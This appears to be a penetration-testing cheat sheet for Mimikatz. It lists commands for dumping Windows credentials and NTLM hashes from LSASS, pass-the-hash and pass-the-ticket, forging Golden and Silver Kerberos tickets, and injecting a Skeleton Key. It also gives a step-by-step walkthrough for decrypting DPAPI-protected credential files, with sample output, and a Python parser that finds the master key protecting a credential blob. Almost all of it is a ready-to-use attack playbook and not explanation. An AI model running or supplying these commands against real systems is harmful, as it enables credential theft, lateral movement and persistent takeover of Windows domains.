PentOpsVault @syztem4our666

Dumping passwords with Mimikatz

Using Mimikatz to Obtain Credentials

Mimikatz Cheat Sheet

Privilege Escalation

Get system

privilege::debug
token::elevate

Credential Dumping

Dump credentials

sekurlsa::logonpasswords

Dump NTLM hashes (MSV1_0 provider)

sekurlsa::msv

Pass-the-Hash

Pass-the-Hash (NTLM)

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>

Kerberos Ticket Attacks

List Kerberos tickets

kerberos::list

Export Kerberos tickets

kerberos::list /export

Golden Ticket

Create Golden Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash>

Silver Ticket

Create Silver Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /target:<server_fqdn> /service:<service> /rc4:<service_account_hash>

Skeleton Key

Inject Skeleton Key

misc::skeleton

Windows Credentials Editor (WCE)

Inject WCE

misc::wce

Pass-the-Ticket

Pass-the-Ticket (inject an exported .kirbi ticket)

kerberos::ptt <ticket_file.kirbi>

Miscellaneous

Load an LSASS minidump for offline parsing (subsequent sekurlsa commands read from the file instead of live memory)

sekurlsa::minidump <lsass_dump.dmp>

Exit Mimikatz

exit

Enumerating Credential Directories

First, list the contents of C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Credentials\ (the /a switch includes hidden files, /q shows the owner):

C:\Users\USERNAME\AppData\Roaming\Microsoft\Credentials>dir /a /q
 Volume in drive C has no label.
 Volume Serial Number is C626-9388

 Directory of C:\Users\USERNAME\AppData\Roaming\Microsoft\Credentials

05/09/2023  03:14 PM    <DIR>          OFFICE\USERNAME          .
01/18/2024  09:34 AM    <DIR>          OFFICE\USERNAME          ..
05/09/2023  01:08 PM               358 OFFICE\USERNAME          18A1927A997A794B65E9849883AC3F3E
05/09/2023  03:03 PM               398 OFFICE\USERNAME          84F1CAEEBF466550F4967858F9353FB4
01/18/2024  11:53 AM               374 OFFICE\USERNAME          E76CCA3670CD9BB98DF79E0A8D176F1E
               3 File(s)          1,130 bytes
               2 Dir(s)   4,465,692,672 bytes free

Decrypting Credentials with Mimikatz

Use Mimikatz to parse a specific credential file (e.g., 84F1CAEEBF466550F4967858F9353FB4):

mimikatz # dpapi::cred /in:C:\Users\USERNAME\AppData\Roaming\Microsoft\credentials\84F1CAEEBF466550F4967858F9353FB4

The output includes the guidMasterKey of the master key that protects this blob; note it, as it identifies the master key file needed in the next steps.

Enumerating Protected Directories

Next, list the contents of C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\:

C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect>dir /a
 Directory of C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect

05/04/2023  09:58 AM    <DIR>          .
01/18/2024  09:34 AM    <DIR>          ..
05/02/2023  03:13 PM                24 CREDHIST
01/17/2024  03:43 PM    <DIR>          S-1-5-21-1199398058-4196589450-691661856-1107
01/17/2024  04:06 PM                76 SYNCHIST
               2 File(s)            100 bytes
               3 Dir(s)   4,463,857,664 bytes free

Identify the SID associated with the directories, e.g., S-1-5-21-1199398058-4196589450-691661856-1107.

Decrypting Master Key

Using Mimikatz, decrypt the master key file named after the guidMasterKey inside the identified SID directory:

mimikatz # dpapi::masterkey /in:C:\Users\USERNAME\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc

Extract the key provided in the output.

Decrypting Credentials with Master Key

Finally, decrypt credentials using the obtained master key:

mimikatz # dpapi::cred /in:C:\Users\USERNAME\AppData\Roaming\Microsoft\credentials\XXXXXX /masterkey:<key>

Replace XXXXXX with the appropriate credential file and <key> with the master key obtained earlier.
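The linkage the steps above rely on is readable straight from the file: a credential blob's header names the GUID of the master key that protects it, and that GUID is the file name under Protect\<SID>\. The following Python parser is an added example (not from the original page or from Mimikatz) that reads the CREDENTIAL_FILE header and the leading DPAPI_BLOB fields of a constructed sample file and resolves the matching master key path; the GUID and SID are the values shown on this page, and no decryption is performed.

```python
import struct
import uuid

# Provider GUID that every DPAPI blob carries (df9d8cd0-1501-11d1-8c7a-00c04fc297eb).
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# Constructed sample input: the master key GUID and SID are the ones shown on this page.
SAMPLE_MASTER_KEY_GUID = "191d3f9d-7959-4b4d-a520-a444853c47eb"
SAMPLE_SID = "S-1-5-21-1199398058-4196589450-691661856-1107"


def build_sample_credential_file(master_key_guid):
    """Construct a minimal credential file for demonstration: the 12-byte
    CREDENTIAL_FILE header (version, blob size, reserved) followed by the
    leading fields of a DPAPI_BLOB. Ciphertext fields are left out on purpose."""
    blob = struct.pack("<I", 1)                    # dwVersion
    blob += DPAPI_PROVIDER_GUID.bytes_le           # guidProvider (mixed-endian GUID)
    blob += struct.pack("<I", 1)                   # dwMasterKeyVersion
    blob += uuid.UUID(master_key_guid).bytes_le    # guidMasterKey
    blob += struct.pack("<II", 0, 0)               # dwFlags, dwDescriptionLen
    return struct.pack("<III", 1, len(blob), 0) + blob


def parse_credential_file(data):
    """Return the master key GUID named in a credential file's DPAPI blob.
    Raises ValueError when the file or blob header is not what DPAPI writes."""
    if len(data) < 12 + 40:
        raise ValueError("file too short for a credential header and DPAPI blob")
    file_version, blob_size, _reserved = struct.unpack_from("<III", data, 0)
    blob = data[12:12 + blob_size]
    blob_version = struct.unpack_from("<I", blob, 0)[0]
    provider = uuid.UUID(bytes_le=blob[4:20])
    master_key_version = struct.unpack_from("<I", blob, 20)[0]
    guid_master_key = uuid.UUID(bytes_le=blob[24:40])
    if file_version != 1 or blob_version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI-protected credential file")
    return {"master_key_version": master_key_version,
            "guid_master_key": str(guid_master_key)}


def master_key_path(username, sid, guid_master_key):
    """Path where dpapi::masterkey expects the matching master key file to live."""
    return "\\".join([r"C:\Users", username,
                      r"AppData\Roaming\Microsoft\Protect", sid, guid_master_key])


if __name__ == "__main__":
    info = parse_credential_file(build_sample_credential_file(SAMPLE_MASTER_KEY_GUID))
    print("guidMasterKey:", info["guid_master_key"])
    print("master key file:", master_key_path("USERNAME", SAMPLE_SID, info["guid_master_key"]))
```

The same header walk applies to any DPAPI blob (CryptProtectData output), not only credential files, once the 12-byte CREDENTIAL_FILE prefix is skipped.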
